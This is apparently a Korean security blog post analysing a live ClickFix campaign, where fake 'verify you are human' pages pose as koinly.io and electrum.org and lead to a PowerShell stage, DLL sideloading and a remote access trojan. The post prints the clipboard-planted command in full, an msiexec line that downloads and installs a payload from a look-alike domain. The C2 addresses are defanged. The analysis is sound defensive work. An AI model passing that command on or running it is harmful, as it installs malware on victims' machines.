본문 바로가기

Analysis

112. ClickFix in wild

ClickFix 공격 기법이 실제 악용되는 사례를 발견해 분석해본다. 본 글에서는 ClickFix 공격 기법을 통해 유포되는 악성코드를 분석한다.

 

먼저, 아래 화면은 ClickFix 공격이 악용되고 있는 공격자의 사이트이다. 실제 도메인은 다른 도메인을 사용중이며 정상 사이트로 위장하기 위해 koinly.io, electrum.org 로 위장하고 있는 것을 볼 수 있다.

Clickfix 공격 화면 1
ClickFix 공격 화면 2

 

위 화면에서 각각 가장 오른쪽에 존재하는 화면인 "Verifying you are human" 이 나타나면 피해자 PC의 클립보드에는 아래와 같은 명령어가 삽입된다.

cmd /c start msiexec /q /i https://deveIoper.com/captcha/verify.msi & rem CIоudfIаre Verificatiоn 91923b⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

 

공격자의 또 다른 사이트로부터 악성코드를 다운로드 및 실행하는 명령어이며, 다운로드 되는 파일 내부에는 아래 그림과 같이 base64 인코딩 된 powershell 명령어가 포함되어 있다.

악성코드 내 포함된 base64 인코딩 된 상태의 powershell 명령어

 

위 powershell 명령어에 대해 base64 디코딩을 진행하면 아래와 같은 코드가 나타난다. 아래 코드는 또 다른 공격자 C2 서버와 통신하는 두 단락의 코드와 추가 악성코드를 다운로드 및 실행하는 코드가 포함되어 있다.

base64 디코딩 powershell 코드

 

포함된 C2 서버 통신 코드는 각각 아래와 같다. 탈취한 피해자의 PC명과 유저명을 파라미터 값으로 삼아 C2 서버로 전송한다. 각각 공격자의 공격 시점 인지를 위해 악성 행위의 시작과 끝을 알리는 역할을 수행하는 것으로 보여진다.

* C2 서버: hxxp://185[.]196[.]8[.]21

C2 서버 통신

 

또한, 추가 악성코드를 드롭 및 실행한다. 악성코드는 zip 파일로 드롭되며 내부 파일에는 정상적인 레지스트리 관리 파일, 정상 DLL 파일들과 함께 악성 DLL이 존재한다. 공격자는 DLL 사이드 로딩 기법을 통해 악성코드를 실행시킨다.

* C2 주소: hxxps://o5e[.]pages[.]dev/?g=1001

base64 인코딩 된 C2 주소
base64 디코딩 된 C2 주소
드롭된 zip 파일 압축 해제 화면

 

위 그림 중 mfc110u.dll 파일이 악성 dll 파일이며 공격자는 악성 dll 파일을 dll 사이드 로딩을 통해 실행, 피해자의 각종 정보를 탈취하고 추가 악성 행위를 수행하는 RAT(Remote Access Trojan) 악성코드를 실행한다. 이를 통해, 지속적으로 피해 PC의 정보를 탈취하고 필요한 경우 또 다른 악성코드를 유포해 감염시키는 등의 행위를 수행한다.

dll 내부 코드 중 일부

 

MITRE ATT&CK

T1204.002 - User Execution: Malicious File

T1189 - Drive-by Compromise

T1566.002 - Phishing: Spearphishing Link

T1059 - Command and Scripting Interpreter

T1059.001 - Command and Scripting Interpreter: PowerShell

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

T1071 - Application Layer Protocol

T1071.001 - Application Layer Protocol: Web Protocols

T1105 - Ingress Tool Transfer

T1072 - Software Deployment Tools

T1027 - Obfuscated Files or Information

T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File

T1102 - Web Service

T1573 - Encrypted Channel

T1036 - Masquerading

T1036.005 - Masquerading: Match Legitimate Name or Location

T1574.001 - Hijack Execution Flow: DLL

T1219 - Remote Access Tools

T1213 - Data from Information Repositories

반응형